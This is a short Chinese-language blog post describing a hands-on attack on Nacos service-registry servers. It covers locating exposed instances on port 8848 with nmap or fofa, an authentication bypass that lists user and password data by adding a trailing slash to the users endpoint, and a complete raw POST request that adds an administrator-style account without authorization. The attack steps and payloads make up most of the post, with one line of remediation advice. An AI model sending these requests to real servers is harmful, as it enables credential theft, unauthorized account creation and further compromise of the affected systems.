Nacos是SpringCloudAlibaba架构中最重要的组件,帮助构建云原生应用的动态服务发现、配置和服务管理平台,提供注册中心、配置中心和动态 DNS 服务三大功能。能够无缝对接Springcloud、Spring、Dubbo等流行框架。
常用于物联网平台如果配置不当导致端口开放到外网会有安全隐患,目前最新的越权和身份绕过漏洞好像还没有修复。
实战
1.使用nmap或者fofa发现端口,该服务默认端口是8848,访问时需要添加/nacos才能访问到登录页面。
2.身份绕过漏洞获取敏感信息,可以自己搭一个服务来获取所有url,不过有用的就是获取用户密码信息,直接在查看用户信息url后面加入“/”即可绕过验证。
正常请求:
http://1.1.1.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
payload:users后面加“/”即可绕过验证
http://1.1.1.1:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9
3.越权漏洞添加用户,直接构造POST请求即可直接添加用户。
POST /nacos/v1/auth/users HTTP/1.1
Host: 1.1.1.1:8848
Content-Length: 26
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://1.1.1.1:8848
Referer: http://1.1.1.1/nacos/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
username=test1&password=test1
4.可以直接登录或者使用身份绕过漏洞查看是否添加成功,使用nacos的注册服务可以执行命令等。
修复建议:
1.配置端口白名单不要开放到公网
